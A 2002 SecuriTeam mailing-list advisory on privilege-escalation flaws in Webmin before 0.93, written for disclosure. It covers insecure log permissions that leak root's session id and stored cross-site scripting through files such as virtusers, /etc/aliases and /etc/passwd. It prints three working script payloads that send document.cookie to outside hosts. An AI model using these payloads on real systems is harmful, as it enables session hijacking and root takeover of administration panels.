[UNIX] Local Privilege Escalation Issues with Webmin
From: support@securiteam.com Date: 03/22/02
From: support@securiteam.com To: list@securiteam.com Date: Fri, 22 Mar 2002 11:51:22 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Local Privilege Escalation Issues with Webmin
------------------------------------------------------------------------
SUMMARY
Webmin (http://www.webmin.com/) is a web-based interface for system
administration for UNIX. Using any browser that supports tables and forms
(and Java for the File Manager module), you can set up user accounts,
Apache, DNS, file sharing and so on. The product has been found to contain
numerous security vulnerabilities; the more severe ones (allowing privilege
escalation) are listed below.
DETAILS
Vulnerable systems:
Webmin versions prior to 0.93
Immune systems:
Webmin version 0.93
Problem #1:
Version 0.92-1 of Webmin (when installed by rpm) leaves insecure
permissions on the /var/webmin directory. This means that if command
logging within Webmin is enabled, any local user can read the
/var/webmin/webmin.log file and retrieve the root user's sid (cookie
session id). It is trivial to then create a faked local cookie using this
session id and log directly into Webmin as root.
Problem #2:
If a semi-trusted colleague is given a restricted level of access to some
Webmin functions, specifically sendmail, then malicious code can be
inserted into certain files that would result in revealing root's Webmin
sid (cookie session id) when the root user visits the related page in
Webmin.
Example Exploit:
Insert the following line into the virtusers file, and wait for the root
user to visit that page:
</tt></a></td><tt><td><script>/*
*/document.write('<imgsrc="http://192.168.40.1/'+document.cookie+'">');</script>
Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:*/+zz+' src="http://10.1.1.33/'+document.cookie+'">');</script>
Potentially more likely to be exploited, however, would be a malicious
local user who has _no_ access to Webmin, who could change a file that
Webmin views through the HTML interface (where the content being read in
is not checked for HTML). An example would be changing their 'real name'
in /etc/passwd to something along the lines of:
<script>zz=unescape("%3A");document.write('<img
src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
(Although chfn doesn't let you specify a username this long, you get
the idea.)
This same problem exists in most parts of Webmin, wherever files (or
command output, such as that of 'ps') are read in and displayed in the
web interface without being checked for HTML.
Solution:
Upgrade to the latest version of Webmin (0.93), which fixes these issues
(as well as a couple of others apparently). Available from:
http://www.webmin.com/download.html
ADDITIONAL INFORMATION
The information has been provided by advisory@prophecy.net.nz.